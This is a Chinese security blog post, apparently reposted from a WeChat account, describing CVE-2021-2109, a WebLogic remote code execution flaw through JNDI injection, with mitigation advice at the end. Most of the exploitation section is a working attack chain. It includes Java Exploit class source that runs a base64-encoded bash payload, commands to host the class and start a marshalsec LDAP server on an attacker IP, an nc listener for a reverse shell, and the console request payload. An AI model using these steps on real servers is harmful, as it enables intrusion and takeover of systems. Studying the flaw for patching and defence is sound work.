CVE-2021-2109 Weblogic RCE

admin 2022年1月14日08:12:57安全文章评论18 views1712字阅读5分42秒阅读模式

CVE-2021-2109 Weblogic RCE

△△△点击上方“蓝字”关注我们了解更多精彩




0x00 漏洞简介

Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。


0x01 影响版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0


0x02 环境搭建
我用的是14883的靶场,网上很多docker的搭建教程,请自行百度
搞定后是下面这样

CVE-2021-2109 Weblogic RCE






0x03 漏洞利用
首先编译一个java文件(bash要base64
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;
public class Exploit{ public Exploit() throws Exception { //Process p = Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"}); Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo'base64编码'|base64 -d |bash"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line; while((line = reader.readLine()) != null) { System.out.println(line); }
p.waitFor(); is.close(); reader.close(); p.destroy(); }
public static void main(String[] args) throws Exception { }}
然后把class拉到服务器启动python服务
python -m SimpleHTTPServer 80

访问服务器,能看到资源就是启动成功

CVE-2021-2109 Weblogic RCE

启动exphttp服务启动ldap服务
java -cpmarshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip.ip.ip.ip/#Exploit 9998
nc端口开启监听
nc -lvnp xxxx

执行exp,反弹shell成功(get,post都可以)

CVE-2021-2109 Weblogic RCE

exp(注意ip是 1.1.1;1 有个分号)
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:9998/s4dzak;AdminServer%22)




0x03 修复建议
1、禁用T3协议
进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器
在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s
2、禁止启用IIOP
登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效
3、临时关闭后台/console/console.portal对外访问
4、升级官方安全补丁








END



如您有任何问题、建议、需求请后台留言NOVASEC公众号!


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


CVE-2021-2109 Weblogic RCE


如有任何问题、建议、合作、投稿请加NOVASEC-MOYU,以方便及时回复。



本文始发于微信公众号(NOVASEC):CVE-2021-2109 Weblogic RCE

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月14日08:12:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CVE-2021-2109 Weblogic RCE http://cn-sec.com/archives/494718.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: